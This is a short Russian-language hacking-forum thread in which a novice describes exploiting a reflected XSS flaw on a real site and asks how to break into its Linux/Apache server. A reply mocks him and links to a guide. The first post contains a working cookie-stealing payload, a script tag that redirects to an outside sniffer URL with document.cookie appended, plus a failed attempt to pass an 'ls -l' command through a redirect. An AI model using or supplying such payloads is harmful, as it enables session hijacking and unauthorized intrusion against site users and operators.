У меня тут такая проблема нашол сайт где можно произвести атаку с JavaScript я вставляю javas code типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script> Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще так <script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд <script>document.location='http://myname.narod.ru/get.txt</script> выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами... Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..
Я так давно не смеялся))) ГениЙ!)) Автор, читай здесь. http://forum.antichat.ru/threadedpost160263.html#post160263 Там с ошибками, но хоть человек знает, что делать.
Понятно значит у меня пасивная Xss атака только на момент сессии )) При обновление все по местам и не каких Xss гг))) А жаль такой сайтик....
